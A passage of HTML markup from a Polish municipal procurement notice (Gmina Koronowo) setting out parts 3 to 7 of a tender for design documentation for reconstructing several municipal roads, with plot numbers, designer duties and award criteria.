class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3 – &#34;Wykonanie projektu przebudowy ul. Rekreacyjnej w Tryszczynie&#34;<br/>Przygotowanie dokumentacji celem wykonania przebudowy drogi gminnej.<br/>I. Dane ogólne<br/>1.	Przebudowa drogi ul. Rekreacyjnej obejmować będzie działki nr 220, 167 obręb: Tryszczyn (Właścicielem działek jest Gmina Koronowo).<br/>2.	Przybliżona długość drogi podlegającej przebudowie wynosi 1660 mb (1,66 km).<br/>3.	W obszarze inwestycji istnieje sieć wodociągowa, elektroenergetyczna i telekomunikacyjna.<br/><br/>II.	Jednostka projektowa zobowiązana będzie do:<br/>1.	Zlecenia jednostce wykonawstwa geodezyjnego wykonanie map do celów projektowych. <br/>Dla przedmiotowego zadania sporządzić mapę do celów projektowych wraz <br/>z rozgraniczeniami; orientacyjna ilość wyznaczenia i stabilizacji punktów granicznych wynosi:<br/>-dz. nr 167 - 2 sztuk (±2 sztuki),<br/>-dz. nr 220 - 3 szt. (±2 sztuki).<br/>2. Zaprojektowania przebudowy drogi ul. Rekreacyjnej w technologii zaproponowanej przez projektanta po uzyskaniu akceptacji rozwiązań na etapie projektu koncepcyjnego; propozycja rozwiązania powinna posiadać uzasadnienie ekonomiczne.<br/>3. Opracowania inwentaryzacji istniejących elementów drogowych i infrastruktury technicznej w pasie drogowym w zakresie projektowanej inwestycji (w zakresie inwentaryzacji należy zinwentaryzować również zjazdy, bramy do posesji, furtki, zasuwy wodociągowe, słupki, znaki, krawężniki, obrzeża i inne elementy które mogą kolidować z projektowaną inwestycją), opracowanie koncepcji do momentu uzyskania akceptacji Zamawiającego, opracowanie projektu budowlanego przebudowy drogi oraz projektu techniczno-wykonawczego wraz z wszystkimi niezbędnymi branżami dla wykonania zadania. <br/>4. Uzyskanie w imieniu Inwestora wszystkich niezbędnych decyzji administracyjnych, w tym decyzji o lokalizacji celu publicznego, decyzji pozwolenia na budowę, zaświadczeń, uzgodnień, opinii i pozwoleń wymaganych przepisami szczególnymi, w tym również wszystkich uzgodnień branżowych niezbędnych do prawidłowego i kompletnego wykonania przedmiotu zamówienia, przede wszystkim: <br/>- wykonanie badań geologicznych/geotechnicznych,<br/>- uzyskanie uchwały nr XXXIX/438/09 Rady Miejskiej w Koronowie z dnia 30 września 2009 r. w sprawie miejscowego planu zagospodarowania przestrzennego dla terenu położonego w Tryszczynie, gmina Koronowo oraz decyzji celu publicznego;<br/>- uzyskanie decyzji o Środowiskowych Uwarunkowaniach oraz opracowanie raportu oddziaływania przedsięwzięcia na środowisko (jeżeli zajdzie taka konieczność)<br/>- opracowanie kompletnego wniosku i uzyskanie decyzji na wycinkę drzew, o ile zajdzie taka potrzeba,<br/>- wykonanie koniecznych opracowań wodno-prawnych wraz z uzyskaniem pozwoleń (o ile będą wymagane),<br/>- zaprojektowanie wszystkich zjazdów na drogi wewnętrzne oraz na przyległe działki, uzgodnienie zjazdów z odpowiednimi organami,<br/>- wykonanie dokumentacji projektowej oraz kosztorysowej z uwzględnieniem wykonania regulacji wysokościowej infrastruktury wodociągowej tj. zasuwy, hydranty, zlokalizowanych w pasie projektowanej drogi;<br/>- zaprojektowanie kanału technologicznego, <br/>- opracowanie i uzyskanie zatwierdzenia projektu tymczasowej organizacji ruchu oraz stałej organizacji ruchu,<br/>- opracowanie kompletnej dokumentacji kosztorysowej tzn. kosztorysów inwestorskich wraz z przedmiarami robót dla wszystkich branż i kategorii robót budowlanych niezbędnych do prawidłowej realizacji zadania,<br/>- opracowanie Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla wszystkich branż i kategorii robót budowlanych będących w zakresie projektu.<br/>- aktualizacji kosztorysu (na własny koszt) po zakończeniu umowy, a przed przystąpieniem do rozpoczęcia prac budowlanych,<br/>- autor dokumentacji projektowo-kosztorysowej zobowiązany będzie nieodpłatnie do uczestniczenia w postępowaniu przetargowym o zamówienie na roboty budowlane poprzez udzielenie odpowiedzi na pytania potencjalnych wykonawców dotyczące dokumentacji w terminie określonym przez zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 4 – &#34;Wykonanie projektu przebudowy ul. Nad Brdą w Tryszczynie&#34;<br/>Przygotowanie dokumentacji celem wykonania przebudowy drogi gminnej.<br/>I. Dane ogólne:<br/>1. Przebudowa drogi gminnej 50143C ul. Nad Brdą obejmować będzie działki nr 371, 392, 534/4, 533/2 oraz 533/3 obręb: Tryszczyn (Właścicielem działek jest Gmina Koronowo).<br/>2.	Dla przedmiotowych działek nie obowiązuje miejscowy plan zagospodarowania przestrzennego.<br/>3.	Przybliżona długość drogi podlegającej przebudowie wynosi 2800 mb (2,8 km).<br/>4.	W obszarze inwestycji istnieje sieć wodociągowa, elektroenergetyczna i teletechniczna.<br/>5.	Działki ewid. nr 533/3 łączą się z działką ewid. 533/1 będącą własnością GDDKiA. Projektowaną nawierzchnią należy dołączyć się do istniejącej nawierzchni asfaltowej znajdującej się na działce 533/1. <br/><br/>II.	Jednostka projektowa zobowiązana będzie do:<br/>1.	Zlecenia jednostce wykonawstwa geodezyjnego wykonanie map do celów projektowych. <br/>Dla przedmiotowego zadania sporządzić mapę do celów projektowych wraz <br/>z rozgraniczeniami; orientacyjna ilość wyznaczenia i stabilizacji punktów granicznych wynosi:<br/>-dz. ewid. nr 371 – 2 sztuki (±2 sztuki),<br/>-dz. ewid. nr 392 – 13 sztuk (±7 sztuk),<br/>-dz. ewid. nr 534/4 – 7 sztuk (±5 sztuk),<br/>-dz. ewid. nr 533/2 – 44 sztuki (±15 sztuk),<br/>-dz. ewid. nr 533/3 – 7 sztuk (±5 sztuk).<br/>2. Zaprojektowania przebudowy drogi ul. Nad Brdą w technologii zaproponowanej przez projektanta po uzyskaniu akceptacji rozwiązań na etapie projektu koncepcyjnego; propozycja rozwiązania powinna posiadać uzasadnienie ekonomiczne, preferowana technologia z wykorzystaniem wzmocnienia i stabilizacji istniejącej podbudowy.<br/>3. Opracowania inwentaryzacji istniejących elementów drogowych i infrastruktury technicznej w pasie drogowym w zakresie projektowanej inwestycji (w zakresie inwentaryzacji należy zinwentaryzować również zjazdy, bramy do posesji, furtki, zasuwy wodociągowe, słupki, znaki, krawężniki, obrzeża i inne elementy które mogą kolidować z projektowaną inwestycją), opracowanie koncepcji do momentu uzyskania akceptacji Zamawiającego, opracowanie projektu budowlanego przebudowy drogi oraz projektu techniczno-wykonawczego wraz z wszystkimi niezbędnymi branżami dla wykonania zadania. <br/>4. Uzyskanie w imieniu Inwestora wszystkich niezbędnych decyzji administracyjnych, w tym decyzji o lokalizacji celu publicznego, decyzji pozwolenia na budowę, zaświadczeń, uzgodnień, opinii i pozwoleń wymaganych przepisami szczególnymi, w tym również wszystkich uzgodnień branżowych niezbędnych do prawidłowego i kompletnego wykonania przedmiotu zamówienia, przede wszystkim: <br/>- wykonanie badań geologicznych/geotechnicznych,<br/>- uzyskanie uzgodnień z gestorami sieci infrastruktury technicznej, <br/>- uzgodnienie zjazdów na drogi gminne z odpowiednimi organami,<br/>- uzyskanie decyzji o Środowiskowych Uwarunkowaniach oraz opracowanie raportu oddziaływania przedsięwzięcia na środowisko (jeżeli zajdzie taka konieczność)<br/>- opracowanie kompletnego wniosku i uzyskanie decyzji na wycinkę drzew, o ile zajdzie taka potrzeba,<br/>- wykonanie koniecznych opracowań wodno-prawnych wraz z uzyskaniem pozwoleń (o ile będą wymagane),<br/>- zaprojektowanie wszystkich zjazdów na drogi wewnętrzne oraz na przyległe działki, uzgodnienie zjazdów z odpowiednimi organami,<br/>- wykonanie dokumentacji projektowej oraz kosztorysowej z uwzględnieniem wykonania regulacji wysokościowej infrastruktury wodociągowej tj. zasuwy, hydranty, zlokalizowanych w pasie projektowanej drogi,<br/>- odprowadzenie wód z nawierzchni poprzez zaprojektowanie kanalizacji deszczowej,<br/>- zaprojektowanie kanału technologicznego, <br/>- opracowanie i uzyskanie zatwierdzenia projektu tymczasowej organizacji ruchu oraz stałej organizacji ruchu,<br/>- opracowanie kompletnej dokumentacji kosztorysowej tzn. kosztorysów inwestorskich wraz z przedmiarami robót dla wszystkich branż i kategorii robót budowlanych niezbędnych do prawidłowej realizacji zadania,<br/>- opracowanie Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla wszystkich branż i kategorii robót budowlanych będących w zakresie projektu.<br/>- aktualizacji kosztorysu (na własny koszt) po zakończeniu umowy, a przed przystąpieniem do rozpoczęcia prac budowlanych,<br/>- autor dokumentacji projektowo-kosztorysowej zobowiązany będzie nieodpłatnie do uczestniczenia w postępowaniu przetargowym o zamówienie na roboty budowlane poprzez udzielenie odpowiedzi na pytania potencjalnych wykonawców dotyczące dokumentacji w terminie określonym przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 5 – &#34;Wykonanie projektu przebudowy drogi gminnej w miejscowości Okole&#34;<br/>Przygotowanie dokumentacji celem wykonania przebudowy drogi gminnej.<br/>I.	Dane ogólne:<br/>1.	Budowa obejmować będzie działki nr: <br/>- działkę nr 77 – obręb Krąpiewo, własność Gmina Koronowo <br/>- działka nr 127/1- obręb Krąpiewo, własność Gminy Koronowo<br/>- działka nr 126 – obręb Krąpiewo, własność Gmina Koronowo<br/>- działka nr 188/2 - obręb Krąpiewo, własność Skarb Państwa<br/>- działka nr 186/18 – obręb Krąpiewo, własność Gmina Koronowo<br/>- działka nr 127/2 – obręb Krąpiewo, własność Gmina Koronowo<br/>- działka nr 61 – obręb Krąpiewo, własność Gmina Koronowo.<br/>2.	Przybliżona długość drogi podlegającej przebudowie wynosi 1400 mb (1,40 km).<br/>3.	W obszarze inwestycji istnieje sieć wodociągowa oraz sieć kanalizacji sanitarnej (uwaga: gestorem sieci kanalizacji sanitarnej nie jest ZGKiM w Koronowie), sieć elektroenergetyczna, sieć telekomunikacyjna.<br/><br/>II.	Jednostka projektowa zobowiązana będzie do:<br/>1.	Zlecenie jednostce wykonawstwa geodezyjnego wykonanie map do celów projektowych. <br/>Dla przedmiotowego zadania sporządzić mapę do celów projektowych wraz <br/>z rozgraniczeniami; orientacyjna ilość wyznaczenia i stabilizacji punktów granicznych wynosi:<br/>-dz. nr 77 - 8 sztuk (±2 sztuk),<br/>-dz. nr 127/1 - 1 szt. (±2 sztuki),<br/>-dz. nr 126 – 3 szt. (±2 sztuki),<br/>-dz. nr 188/2 – 3 szt. (±2 sztuki),<br/>-dz. nr 186/18 – 2 szt. (±2 sztuki),<br/>-dz. nr 127/2 – 0 szt. (±2 sztuki),<br/>-dz. nr 61 – 21 szt. (±5 sztuki).<br/>2. Zaprojektowania przebudowy drogi gminnej w Krąpiewie w technologii zaproponowanej przez projektanta po uzyskaniu akceptacji rozwiązań na etapie projektu koncepcyjnego; propozycja rozwiązania powinna posiadać uzasadnienie ekonomiczne.<br/>3. Opracowanie inwentaryzacji istniejących elementów drogowych i infrastruktury technicznej w pasie drogowym w zakresie projektowanej inwestycji (w zakresie inwentaryzacji należy zinwentaryzować również zjazdy, bramy do posesji, furtki, zasuwy wodociągowe, słupki, znaki, krawężniki, obrzeża i inne elementy które mogą kolidować z projektowaną inwestycją), opracowanie koncepcji do momentu uzyskania akceptacji Zamawiającego, opracowanie projektu budowlanego przebudowy drogi oraz projektu techniczno-wykonawczego wraz z wszystkimi niezbędnymi branżami dla wykonania zadania. <br/>4. Uzyskanie w imieniu Inwestora wszystkich niezbędnych decyzji administracyjnych, w tym decyzji o lokalizacji celu publicznego, decyzji pozwolenia na budowę, zaświadczeń, uzgodnień, opinii i pozwoleń wymaganych przepisami szczególnymi, w tym również wszystkich uzgodnień branżowych niezbędnych do prawidłowego i kompletnego wykonania przedmiotu zamówienia, przede wszystkim: <br/>- wykonanie badań geologicznych/geotechnicznych,<br/>- uzyskanie decyzji celu publicznego,<br/>- uzyskanie decyzji o Środowiskowych Uwarunkowaniach oraz opracowanie raportu oddziaływania przedsięwzięcia na środowisko (jeżeli zajdzie taka konieczność),<br/>- opracowanie kompletnego wniosku i uzyskanie decyzji na wycinkę drzew, o ile zajdzie taka potrzeba,<br/>- wykonanie koniecznych opracowań wodno-prawnych wraz z uzyskaniem pozwoleń (o ile będą wymagane),<br/>- zaprojektowanie wszystkich zjazdów na drogi wewnętrzne oraz na przyległe działki, uzgodnienie zjazdów z odpowiednimi organami,<br/>- wykonanie dokumentacji projektowej oraz kosztorysowej z uwzględnieniem wykonania regulacji wysokościowej infrastruktury wodociągowej tj. zasuwy, hydranty, zlokalizowanych w pasie projektowanej drogi;<br/>- opracowanie i uzyskanie zatwierdzenia projektu tymczasowej organizacji ruchu oraz stałej organizacji ruchu,<br/>- opracowanie kompletnej dokumentacji kosztorysowej tzn. kosztorysów inwestorskich wraz z przedmiarami robót dla wszystkich branż i kategorii robót budowlanych niezbędnych do prawidłowej realizacji zadania,<br/>- zaprojektowanie w technologii zaproponowanej przez projektanta, konieczne jest uzyskanie akceptacji przez Inwestora zaproponowanych rozwiązań na etapie projektu koncepcyjnego, propozycja powinna posiadać uzasadnienie ekonomiczne. Inwestor preferuje technologię, która będzie obejmować wzmocnienie oraz stabilizację istniejącej podbudowy<br/>- opracowanie Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla wszystkich branż i kategorii robót budowlanych będących w zakresie projektu.<br/>- aktualizacji kosztorysu (na własny koszt) po zakończeniu umowy, a przed przystąpieniem do rozpoczęcia prac budowlanych,<br/>- autor dokumentacji projektowo-kosztorysowej zobowiązany będzie nieodpłatnie do uczestniczenia w postępowaniu przetargowym o zamówienie na roboty budowlane poprzez udzielenie odpowiedzi na pytania potencjalnych wykonawców dotyczące dokumentacji w terminie określonym przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 6 – &#34;Wykonanie projektu przebudowy drogi gminnej w miejscowości Krąpiewo&#34;<br/>Przygotowanie dokumentacji celem wykonania przebudowy drogi gminnej.<br/>Zakres projektu obejmuje:<br/>1. Przebudowę drogi gminnej 50136C (dz. ewid. nr 216, 197, 8) w miejscowości Okole, gmina Koronowo (odcinek zaznaczony na załączniku mapowym),oraz 292 obręb Stary Dwór.<br/>2. Dla przedmiotowych działek nie obowiązuje miejscowy plan zagospodarowania przestrzennego.<br/>3. Odcinek o długości około 2.241 mb.<br/>4. Wszystkie zjazdy na drogi wewnętrzne oraz na przyległe działki.<br/>5. Uzgodnienie zjazdów na drogi gminne z właściwymi organami.<br/>6. W drodze znajduje się sieć wodociągowa, energia elektryczna, kanalizacja sanitarna oraz sieć teletechniczna.<br/>7. Odwodnienie nawierzchni drogi (sposób rozwiązania odwodnienia drogi należy ustalić na etapie projektu z Inwestorem).<br/>8. Zaprojektowana w technologii zaproponowanej przez projektanta, po uzyskaniu akceptacji rozwiązań na etapie projektu koncepcyjnego; propozycja powinna posiadać uzasadnienie ekonomiczne.<br/>9. Preferowana technologia z wykorzystaniem wzmocnienia i stabilizacji istniejącej podbudowy.<br/>10. Projekty i kosztorysy powinny uwzględnić wykonanie regulacji wysokościowej infrastruktury wodociągowej i kanalizacji sanitarnej, tj. zasuw, hydrantów, studni rewizyjnych zlokalizowanych w pasie projektowanej drogi.<br/>II. Jednostka projektowa zobowiązana będzie do:<br/>1. pozyskania we własnym zakresie i na własny koszt wszystkich danych wyjściowych do projektowania oraz uzgodnień, w tym opinii technicznych oraz aktualnej mapy do celów projektowych.<br/>2. Opracowania mapy do celów projektowych dla powyższego zadania wraz z rozgraniczeniami; orientacyjna ilość wyznaczenia i stabilizacji punktów granicznych wynosi:<br/>•	dz. ewid. nr 216 – 22 sztuki (±10 sztuk),<br/>•	dz. ewid. nr 197 – 40 sztuk (±10 sztuk);<br/>•	dz. ewid. nr 292 – 1 sztuka (±5 sztuk);<br/>•	dz. ewid. nr 8 – 5 sztuk (±5 sztuk).<br/>3. Uzyskania decyzji o lokalizacji celu publicznego, decyzji o środowiskowych uwarunkowaniach oraz pozwolenia wodnoprawnego, o ile przyjęte rozwiązania techniczne wymuszą taką konieczność.<br/>4. Uzyskania decyzji zezwalającej na wycinkę drzew, o ile zajdzie taka potrzeba.<br/>5. Uzgodnienia projektu z gestorami sieci infrastruktury technicznej.<br/>6. Uzgodnienia z Wydziałem Inwestycji i Remontów Urzędu Miejskiego w Koronowie, przed przystąpieniem do prac projektowych, zakresu robót oraz aspektów technicznych do ujęcia w opracowaniu.<br/>7. Zaprojektowanie kanału technologicznego.<br/>8. Dokonania, przed właściwym organem, zgłoszenia robót budowlanych, bądź, w przypadku braku konieczności, złożenia wniosku o wydanie decyzji pozwolenie na budowę.<br/>9. Opracowania kompletnej dokumentacji kosztorysowej tj. kosztorysów inwestorskich i ofertowych wraz z przedmiarami robót dla wszystkich branż i kategorii robót budowlanych niezbędnych do prawidłowej realizacji zadania.<br/>10. Opracowania Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla wszystkich branż i kategorii robót budowlanych będących w zakresie projektu.<br/>11. Wykonania projektu tymczasowej organizacji ruchu na czas prowadzenia robót.<br/>12. Wykonania projektu stałej organizacji ruchu dla projektowanej drogi.<br/>13. Aktualizacji kosztorysu na wezwanie Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 7 – „Wykonanie projektu drogi gminnej 050130C w Gogolinie – fundusz sołecki”<br/>Przygotowanie dokumentacji celem wykonania przebudowy drogi gminnej<br/>I. Dane ogólne<br/>1. Przebudowa drogi gminnej działka ewid. nr 86/3 obręb Gogolin, gmina Koronowo.<br/>2. Odcinki o długości ok. 560 mb.<br/>3. Wszystkie zjazdy na drogi wewnętrzne oraz na przyległe działki.<br/>4. Uzgodnienie zjazdów na drogi gminne z odpowiednimi organami.<br/>5. Skrzyżowanie z działką 6/1 drogi gminnej z drogą powiatową.<br/>6. Projekt powinien zawierać wymianę istniejących przyłączy wodociągowych do posesji działek przyległych.<br/>7. Zaprojektowana w technologii zaproponowanej przez projektanta po uzyskaniu akceptacji rozwiązań na etapie projektu koncepcyjnego; propozycja rozwiązania powinna posiadać uzasadnienie ekonomiczne.<br/>8. Preferowana technologia z wykorzystaniem wzmocnienia i stabilizacji istniejącej podbudowy.<br/><br/>Jednostka projektowa zobowiązana będzie do:<br/>1. Pozyskania we własnym zakresie i na własny koszt wszystkich danych wyjściowych do projektowania oraz uzgodnień, w tym opinii technicznych, aktualnej mapy do celów projektowych, (dla przedmiotowej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego).<br/>2. Opracowania mapy do celów projektowych dla powyższego zadania wraz z rozgraniczeniem. Orientacyjna ilość wyznaczenia i stabilizacji punktów granicznych wynosi: dla działki nr 86/3 - 22 sztuk (± 5 sztuk).<br/>3. Uzyskania decyzji o lokalizacji inwestycji celu publicznego, decyzji o środowiskowych uwarunkowaniach oraz pozwolenia wodnoprawnego, o ile przyjęte rozwiązania techniczne wymuszą taką konieczność.<br/>4. Uzyskania decyzji na wycinkę drzew, o ile będzie taka potrzeba.<br/>5. Uzgodnienia projektu z gestorami sieci infrastruktury technicznej.<br/>6. Uzgodnienia z Wydziałem Inwestycji i Remontów Urzędu Miejskiego w Koronowie, przed przystąpieniem do prac projektowych, zakresu robót oraz aspektów technicznych do ujęcia w opracowaniu.<br/>7. Zaprojektowania kanału technologicznego.<br/>8. Dokonania przed właściwym organem zgłoszenia robót budowlanych, bądź w przypadku konieczności złożenia wniosku o wydanie decyzji pozwolenia na budowę.<br/>9. Opracowania kompletnej dokumentacji kosztorysowej tj. kosztorysów inwestorskich i ofertowych wraz z przedmiarami robót dla wszystkich branż i kategorii robót budowlanych niezbędnych do prawidłowej realizacji zadania,<br/>10. Opracowania Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla wszystkich branż i kategorii robót budowlanych będących w zakresie projektu.<br/>11. Wykonania projektu stałej organizacji ruchu.<br/>12. Wykonania projektu tymczasowej organizacji ruchu.<br/>13. Aktualizacji kosztorysu (na własny koszt) po zakończeniu umowy, przed przystąpieniem do rozpoczęcia prac budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span 